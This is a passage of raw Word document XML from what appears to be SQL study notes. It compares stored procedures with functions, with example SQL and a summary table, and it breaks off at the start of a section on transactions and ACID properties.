    <w:p w14:paraId="230F8B3D"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D6639"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Always returns a value, whether it's a scalar value (like an integer, string, etc.) or a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682761FC"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The return value is usually used in SQL queries and calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E6F31D"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3. Invocation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C096EF6"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tored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F29B86"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Invoked using the CALL statement or by executing the procedure in a client application or a script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06453A73"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Cannot be used directly in SQL queries (like SELECT or WHERE clauses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E00E4B"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369115C9"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 xml:space="preserve">Invoked as part of a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL statement</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., in SELECT, WHERE, HAVING clauses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD7EE2"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Can be used directly within SQL expressions, making it more versatile in query logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F98D26"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4. Side Effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8DE20"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tored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E13B8"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A stored procedure can modify the database state (e.g., insert, update, delete records).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22274620"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It has side effects, as it can change the state of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B9F51E"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD6248"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 xml:space="preserve">Functions are typically </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side-effect-free</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and do not modify database states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB02A96"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They are designed to return a result without altering data (although there are exceptions in some databases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535EB2CE"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5. Transaction Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE5B7B"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tored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230864F0"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 xml:space="preserve">A stored procedure can have </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction control</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands like BEGIN, COMMIT, and ROLLBACK to manage the transaction state explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14150A5B"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AFD42"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 xml:space="preserve">A function </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manage transaction control (i.e., it cannot explicitly commit or rollback a transaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012894C"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6. Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0229E48E"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tored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31DB0D"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Stored procedures can have input (IN), output (OUT), or input-output (INOUT) parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD55CB"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C135F1"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 xml:space="preserve">Functions typically only have </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>input parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and must return a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F5FA7"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7. Error Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C45624E"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tored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD945F9"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 xml:space="preserve">Stored procedures can handle errors using </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception handling</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanisms like TRY...CATCH blocks, or using specific error codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E09D9"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC79A2"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Functions can have basic error handling but are generally simpler and may not have advanced error-handling mechanisms like stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C337B5"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8. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CFE43"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tored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F30C35"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CREATE PROCEDURE AddEmployee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68282C1D"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IN emp_name VARCHAR(50), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683143BA"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IN emp_salary DECIMAL(10, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450025B0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B2B917"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30736D44"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INSERT INTO Employee (name, salary) VALUES (emp_name, emp_salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57338F3C"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700AE036"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Can be invoked using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C487BA3"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CALL AddEmployee('John Doe', 50000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC1E84"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB82FF"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CREATE FUNCTION GetEmployeeSalary (emp_id INT) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D50B2"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RETURNS DECIMAL(10, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD9143"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A6D97"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DECLARE emp_salary DECIMAL(10, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB00D0"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  SELECT salary INTO emp_salary FROM Employee WHERE id = emp_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B05ED"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RETURN emp_salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F3130"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABEBAFA" w14:textId="77777777" w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w:rsidRDefault="002E5BA0"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Can be invoked in a query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02180009"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SELECT GetEmployeeSalary(101);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC60C71"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6"/>
        <w:gridCol w:w="4344"/>
        <w:gridCol w:w="4004"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="5FB9987A" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D84D94"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4225015B"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tored Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20B1CAB0"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Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="554768CC" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E1B78A7"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Return Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF093EF"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No direct return value (can use OUT parameters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E67F5A3"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Always returns a value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="16D36862" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F8C3A3E"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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31A33816"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Perform complex operations, modify DB state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DAB7C7B"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Compute and return values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="0A1D2AE2" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47582814"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Invocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C06751D"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CALL statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EC797F3"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Can be used in SQL queries (SELECT, WHERE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="6D03DD1F" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C02DF45"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ide Effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353C1243"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Can modify data (INSERT, UPDATE, DELETE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C957705"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Should not modify data (side-effect free)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="2F49FE71" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4846D417"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Transaction Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60434A80"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Can manage transactions (COMMIT, ROLLBACK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108DE9AB"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Cannot manage transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="3B5F7164" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B30D2B"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Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="240CF57A"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Advanced error handling with exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20320E68"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Basic error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="75D03906" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="578DD95A"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Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D82B3B"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Supports IN, OUT, and INOUT parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFF78F6"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Supports only IN parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="4AF71A87" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50289C35"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40FD6F00"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Complex business logic, data manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5598335B"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Simple calculations, data retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04C1792D" w14:textId="77777777" w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w:rsidRDefault="002E5BA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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D525572"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to encapsulate complex logic, modify the database state, or handle multiple queries within a single unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA49C54" w14:textId="77777777" w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w:rsidRDefault="002E5BA0"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to calculate or retrieve values based on inputs and want to use them in SQL queries (e.g., SELECT or WHERE clauses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6AA6AF" w14:textId="3060C32D"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47EB7E80">
          <v:rect id="_x0000_i3047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BFFE1" w14:textId="51F6069F" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="748" w:name="_Toc196308228"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Transaction in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="748"/>
    </w:p>
    <w:p w14:paraId="490E3FCF" w14:textId="005A43F9" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL refers to a sequence of one or more SQL operations that are executed as a single unit. Transactions ensure the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID properties</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Atomicity, Consistency, Isolation, Durability) are maintained, which guarantees the reliability and integrity of the database, even in the case of system failures.</w:t>
